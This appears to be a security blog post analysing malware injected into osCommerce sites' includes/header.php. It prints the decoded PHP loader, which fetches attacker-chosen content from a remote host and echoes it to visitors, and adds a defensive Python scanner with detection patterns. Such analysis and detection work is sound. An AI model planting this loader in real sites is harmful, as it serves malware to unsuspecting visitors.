Malware update: (and osCommerce)

Quick malware update: We are seeing many osCommerce sites infected with malware managed by, and a few others. All the domains involved are hosted at

These domains were registered by, which is also involved in other malicious activities (,,,etc).

The infected sites had a large encoded entry added to the file includes/header.php:


Which when decoded, calls to get what malware to present to the end user:

$url = @file_get_contents($h37.":"."//".$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.".
urlencode($_SERVER["HTTP_HOST"]));
if (strstr($url,"!go!")){$url = explode("!go!",$url); $url = $url[1];echo $url;}
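
A defender-side check for the traits described above, as an added example that is not part of the original post: it flags a long encoded run in includes/header.php and, in already-decoded code, the remote fetch keyed on HTTP_HOST and the !go! marker. The 200-character threshold, the finding labels and the sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Heuristic (assumption): an unbroken run of 200+ base64/hex alphabet characters
# is unusual in a hand-written osCommerce template such as includes/header.php.
LONG_BLOB = re.compile(r"[A-Za-z0-9+/=]{200,}")
# Traits of the decoded stage shown on the page.
REMOTE_FETCH = re.compile(r"file_get_contents\s*\(")
HOST_LEAK = re.compile(r"""\$_SERVER\s*\[\s*["']HTTP_HOST["']\s*\]""")
MARKER = "!go!"

def scan_php_source(text):
    """Return a sorted list of finding labels for one PHP source string."""
    findings = set()
    if LONG_BLOB.search(text):
        findings.add("long-encoded-blob")
    if REMOTE_FETCH.search(text) and HOST_LEAK.search(text):
        findings.add("remote-fetch-keyed-on-host")
    if MARKER in text:
        findings.add("go-marker")
    return sorted(findings)

def scan_webroot(root):
    """Scan every includes/header.php below root; map path -> findings."""
    results = {}
    for path in Path(root).rglob("header.php"):
        if path.parent.name != "includes":
            continue
        hits = scan_php_source(path.read_text(errors="replace"))
        if hits:
            results[str(path)] = hits
    return results

# Constructed samples (not taken from a real infection).
CLEAN = '<?php require(DIR_WS_INCLUDES . "counter.php"); ?>\n<table border="0">'
ENCODED = "<?php $x = '" + "QUJD" * 80 + "'; ?>\n" + CLEAN
DECODED = ('$url = @file_get_contents($u . urlencode($_SERVER["HTTP_HOST"]));'
           'if (strstr($url,"!go!")){ $url = explode("!go!",$url); echo $url[1]; }')

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("encoded", ENCODED), ("decoded", DECODED)):
        print(name, scan_php_source(sample))
```

A hit on the encoded-blob heuristic is a prompt to diff the file against a known-good copy of the osCommerce release, not proof of infection on its own.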

Some details here as well:

About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.